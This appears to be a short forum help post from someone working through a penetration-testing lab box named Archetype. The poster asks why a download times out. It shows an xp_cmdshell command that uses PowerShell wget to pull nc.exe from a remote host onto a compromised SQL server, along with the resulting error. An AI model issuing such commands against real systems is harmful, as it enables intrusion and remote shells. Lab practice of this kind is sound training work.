I don't know why the wget command to the downlaod the netcat keeps timing out... any help please

SQL (ARCHETYPE\sql_svc dbo@master)> xp_cmdshell “powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.15.24/nc.exe -outfile nc.exe”
output

wget : The operation has timed out.

At line:1 char:32

  • … ers\sql_svc\Downloads; wget http://10.10.15.24/nc.exe -outfile nc.exe

  •                        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~        
    
    • CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebExc

    eption

    • FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

NULL